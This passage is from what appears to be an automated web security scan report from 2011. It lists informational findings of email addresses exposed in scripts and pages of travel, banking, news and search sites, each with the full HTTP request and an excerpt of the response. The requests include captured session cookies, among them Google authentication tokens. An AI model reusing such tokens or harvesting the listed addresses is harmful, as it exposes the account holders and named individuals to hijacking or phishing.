* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

22.14. http://travela.priceline.com/zp/zpcal/src/calendar-core.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /zp/zpcal/src/calendar-core.js

Issue detail

The following email address was disclosed in the response:

Request

GET /zp/zpcal/src/calendar-core.js HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:11:08 GMT
Server: Apache
Last-Modified: Wed, 28 Jul 2010 17:45:22 GMT
ETag: "e68091-1c0c2-48c762e8f1080"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 114882
Content-Type: text/javascript


// $Id: calendar-core.js 3672 2006-07-17 14:36:50Z slip $

/**
* The Calendar object constructor. Call it, for example, like this:
*
* \code
* // the following function is called when
...[SNIP]...
<support@zapatec.com>
...[SNIP]...

22.15. http://travelocity.ugc.bazaarvoice.com/module/0025-en_us/sy/0025-en_us/display.pkg.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travelocity.ugc.bazaarvoice.com
Path:   /module/0025-en_us/sy/0025-en_us/display.pkg.js

Issue detail

The following email address was disclosed in the response:

Request

GET /module/0025-en_us/sy/0025-en_us/display.pkg.js HTTP/1.1
Host: travelocity.ugc.bazaarvoice.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travel.travelocity.com/hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="Bazaarvoice does not have a P3P policy."
Last-Modified: Fri, 30 Sep 2011 14:20:29 GMT
Content-Type: text/javascript;charset=utf-8
Vary: Accept-Encoding
Content-Length: 67557
Cache-Control: max-age=594
Expires: Mon, 03 Oct 2011 00:21:14 GMT
Date: Mon, 03 Oct 2011 00:11:20 GMT
Connection: close

$BV.Internal.define("jquery.ui.core",[document],["jquery.core"],function(a,b){
/*
* jQuery UI 1.8.6
*
* Copyright 2010, AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT or GPL
...[SNIP]...
extend(c.ui.slider,{version:"1.8.6"})}(a))});
$BV.Internal.define("jquery.rating",[],["jquery.core"],function(a){
/*
### jQuery Star Rating Plugin v2.5 - 2008-09-10 ###
* http://www.fyneworks.com/ - diego@fyneworks.com
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/licenses/gpl.html
###
Project: http://plugins.jquery.com/project/Mult
...[SNIP]...

22.16. http://w.sharethis.com/button/buttons.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /button/buttons.js

Issue detail

The following email address was disclosed in the response:

Request

GET /button/buttons.js HTTP/1.1
Host: w.sharethis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
Expires: Tue, 04 Oct 2011 00:08:53 GMT
Cache-Control: max-age=86400
Content-Length: 60743
Date: Mon, 03 Oct 2011 00:26:58 GMT
Connection: close
Vary: Accept-Encoding

var cookie=new function(){return{setCookie:function(d,f,h){if(h){var c=new Date();c.setTime(c.getTime()+(h*24*60*60*1000));var a="; expires="+c.toGMTString()}else{var a=""}var b=d+"="+escape(f)+a;var
...[SNIP]...
rn false}stLight.processSTQ();stLight.readyRun=true;if(stLight.publisher==null){if(typeof(window.console)!=="undefined"){try{console.debug("Please specify a ShareThis Publisher Key \nFor help, contact support@sharethis.com")}catch(a){}}}var b=stLight.getSource();stLight.log("pview",b,"");stWidget.options.sessionID=stLight.sessionID;stWidget.options.fpc=stLight.fpc;stLight.loadServicesLoggedIn(function(){stButtons.onRead
...[SNIP]...

22.17. http://www.aon.com/js/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aon.com
Path:   /js/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/s_code.js HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.aon.com/manchesterunited/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26688-1241617105000"
Last-Modified: Wed, 06 May 2009 13:38:25 GMT
Content-Type: text/javascript
Content-Length: 26688
Date: Sun, 02 Oct 2011 23:58:41 GMT

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...

22.18. http://www.barclayswealth.com/Scripts/swfobject_modified.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barclayswealth.com
Path:   /Scripts/swfobject_modified.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Scripts/swfobject_modified.js HTTP/1.1
Host: www.barclayswealth.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PD_STATEFUL_f8c38b02-59b3-11de-be40-001a64b96864=%2F; BIGipServerwpl_GRN_TEST3_static_http_pool=1948654764.14535.0000

Response

HTTP/1.1 404 Not found
content-type: text/html
date: Sun, 02 Oct 2011 23:58:04 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
vary: accept-encoding
cache-control: public,max-age=3600
Content-Length: 11007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">
<head>
...[SNIP]...
<a href="mailto:bw_webteam@barclayswealth.com">
...[SNIP]...

22.19. http://www.barclayswealth.com/important-information.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barclayswealth.com
Path:   /important-information.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /important-information.htm HTTP/1.1
Host: www.barclayswealth.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.barclayswealth.com/brokerage.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PD_STATEFUL_f8c38b02-59b3-11de-be40-001a64b96864=%2F; BIGipServerwpl_GRN_TEST3_static_http_pool=1948654764.14535.0000; sifrFetch=true; __utma=1.1111853373.1317599886.1317599886.1317599886.1; __utmb=1.10.10.1317599886; __utmc=1; __utmz=1.1317599886.1.1.utmcsr=cdn.flashtalking.com|utmccn=(referral)|utmcmd=referral|utmcct=/xre/18/183799/231524/swf/Barclays_wealth_dynamic_300x250.swf; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d030fc451; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317618188776:ss=1317617886010; __utma=1.1111853373.1317599886.1317599886.1317599886.1; __utmb=1.11.10.1317599886; __utmc=1; __utmz=1.1317599886.1.1.utmcsr=cdn.flashtalking.com|utmccn=(referral)|utmcmd=referral|utmcct=/xre/18/183799/231524/swf/Barclays_wealth_dynamic_300x250.swf; _wt.mode-79569=e1f36dbd085f0041d284; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a04d7d1af

Response

HTTP/1.1 200 OK
content-type: text/html
date: Mon, 03 Oct 2011 00:03:17 GMT
etag: W/"12576-4e788ec6"
last-modified: Tue, 20 Sep 2011 13:01:58 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
vary: accept-encoding
cache-control: public,max-age=3600
Content-Length: 75126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<head>
...[SNIP]...
<a href="mailto:complaint.info@financial-ombudsman.org.uk"><strong>complaint.info@financial-ombudsman.org.uk</strong>
...[SNIP]...

22.20. http://www.expedia.com/static/default/default/scripts/formController.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/scripts/formController.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/default/default/scripts/formController.js?v=release-2011-09-r3.10.274201 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"17449-1317085613183"
Last-Modified: Tue, 27 Sep 2011 01:06:53 GMT
Content-Type: text/javascript
Cteonnt-Length: 17449
Content-Length: 17449
Vary: Accept-Encoding
Cache-Control: private, max-age=37298
Date: Mon, 03 Oct 2011 00:10:36 GMT
Connection: close

/**
* @fileOverview Contains jQuery plugin code for form manipulation
* @version 0.9
* @author Jay Boyer <jboyer@expedia.com>
*/
/**
* See (http://jquery.com/).
* @name jQuery
* @namesp
...[SNIP]...

22.21. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The following email address was disclosed in the response:

Request

GET /search?gcx=c&sourceid=chrome&ie=UTF-8&q=sabre+travel HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=F8u0EXbNU4KGhvc02SYfdp-DEFElXzMn6jXCTpOMvEOJYkdCLz3OJlTrIyDS_Aq137v2MBKPkV6-2QEY3WGlenJjN02KGhLt0GGahhHj45EKWRTWFnwTHKW2IIFkuGEp; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjXmxcb1SChjECiXSjEaqO-DnawkdCeNdpQ1eq5H7VQaB1TYoVNaHivfCOnRdR3nNOQ08CAf6CRApbTves9jTDvA3EsEz817LyYCYCbZsTHriQICDzjjFZGK6LqC9xB10_TSh1omi0Cz3S6WTEQKI4YWzinp7wd_vo_RGZ0Q7Pmh8a7ryXTtM1Q9zJgPjGhZAWlQtcmVUtvW6l7weDo9XnzQ4xsrHMoS73ySwvooWqNnqucKMrgZgH8M9keX_Pz9mAcFTAqTRl1KdCO3svISfz05dJpITuMlwLigsrRt_DeV0

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:50 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/sXoKgwNA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 119232

<!doctype html> <head> <title>sabre travel - Google Search</title> <script>window.google={kEI:"mvyIToKwK-vViAKS4LWcDA",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid"
...[SNIP]...
on(){m.prm&&m.prm()},Va=function(a){t("m",function(){m.spn(a)})},Wa=function(a){t("m",function(){m.spp(a)})};n("spn",Va);n("spp",Wa);Ca("gbd4",Ua);
if(_tvb("true",e)){var Xa={g:_tvv("1"),d:_tvv(""),e:"test@fastdial.net",m:"fastdial.net",p:"//lh4.googleusercontent.com/-V_veHrrsDKY/AAAAAAAAAAI/AAAAAAAAAAA/XUAjI0bxyLA/s96-c/photo.jpg",xp:_tvv("1"),mg:"%1$s (delegated)",md:"%1$s (default)"};p.prf=Xa}
if(_tvv("1")&&_tvv(
...[SNIP]...
<span id=gbi4m1>test@fastdial.net</span>
...[SNIP]...
<span class=gbps2>test@fastdial.net</span>
...[SNIP]...

22.22. http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /football/2011/sep/27/manchester-united-basel-live

Issue detail

The following email addresses were disclosed in the response:

Request

GET /football/2011/sep/27/manchester-united-basel-live HTTP/1.1
Host: www.guardian.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; s_pers=%20s_lv%3D1317599402360%7C1412207402360%3B%20s_lv_s%3DFirst%2520Visit%7C1317601202360%3B%20s_visit%3D1%7C1317601202363%3B%20c_dl%3D1%7C1317601202366%3B%20s_ev36_persist%3DDirect%2520Load%7C1318204202383%3B%20s_37_persist%3DDirect%2520Load%7C1318204202395%3B%20s_ev40%3D%255B%255B'Direct%252520Load'%252C'1317599402404'%255D%255D%7C1475452202404%3B%20gpv_pageName%3DManchester%2520United%253AKeyword%2520Page%253A589863%7C1317601202406%3B%20s_nr%3D1317599402415-New%7C1349135402415%3B; s_vi=[CS]v1|27447C5685010C0B-4000010320138FC1[CE]; OAX=Mhd7ak6I+K0ABUJY; OAX_tmp=4d686437616b36492b4b304142554a59; _publishflow=4galn0lq98x95vrg; member_type=0; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B%20s_ppv%3D27%3B; GU_ST=; rsi_segs=

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:57:55 GMT
Server: Apache
X-GU-jas: 54-23155
X-GU-PageRenderer: Hypercharger
Content-Type: text/html; charset=UTF-8
Set-Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; path=/; domain=.guardian.co.uk; expires=Sun, 23-Oct-2011 23:57:55 GMT
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 52
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Content-Length: 121369
Connection: close


<!DOCTYPE html><html lang="en">

<head>
                <script type="text/javascript" >
document.domain = "guardian.co.uk";

...[SNIP]...
<a href="mailto:barry.glendenning@guardian.co.uk">barry.glendenning@guardian.co.uk</a>
...[SNIP]...
<a href="mailto:football.editor@guardianunlimited.co.uk">
...[SNIP]...
<a href="mailto:reader@guardian.co.uk">reader@guardian.co.uk</a>
...[SNIP]...
<a href="mailto:letters@guardian.co.uk">letters@guardian.co.uk</a>
...[SNIP]...
<a href="mailto:userhelp@guardian.co.uk">userhelp@guardian.co.uk</a>
...[SNIP]...
<a href="mailto:football.editor@guardianunlimited.co.uk">
...[SNIP]...
<a href="mailto:reader@guardian.co.uk">reader@guardian.co.uk</a>
...[SNIP]...
<a href="mailto:letters@guardian.co.uk">letters@guardian.co.uk</a>
...[SNIP]...
<a href="mailto:userhelp@guardian.co.uk">userhelp@guardian.co.uk</a>
...[SNIP]...

22.23. http://www.hotels.com/hotel/details.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:28:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=H7gAAAAAAAIAAAAAAAAAAAAAAAYAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:28:19 GMT
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:28:19 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:19 GMT; Path=/
Content-Length: 238921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
<a id="header_mailto_or_oo" href="mailto:userexperience@hotels.com?subject=Site feedback: hotel details page description tab|en_US|HCOM_US|www.hotels.com " rel="nofollow" title="Love or hate this site? Tell us what you think." showoo="true">
...[SNIP]...
<li>emailaddress1@domain.com</li>
<li>emailaddress2@domain.com</li>
...[SNIP]...
<a id="toplinks_mailto_or_oo" href="mailto:userexperience@hotels.com?subject=Site feedback: hotel details page description tab|en_US|HCOM_US|www.hotels.com " rel="nofollow" title="Love or hate this site? Tell us what you think." showoo="true">
...[SNIP]...
eDate=10-07-11&rooms[0].numberOfAdults=2&validate=false&previousDateful=false&nightlyPrice=289%2CUSD&dateful=true",
serverSideTab: "description",
pageType: "dateful",
feedbackHref: "mailto:userexperience@hotels.com?subject=Site feedback: {0};POS: en_US",
pushpinImg: "/images/static/map/map_pin_hotel_active_us.png",
googleClientId: "gme-expedia",
queryFormMVTVariant: true,
cognitiveMatchCarouselHo
...[SNIP]...

22.24. http://www.hotels.com/search.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /search.do

Issue detail

The following email address was disclosed in the response:

Request

GET /search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
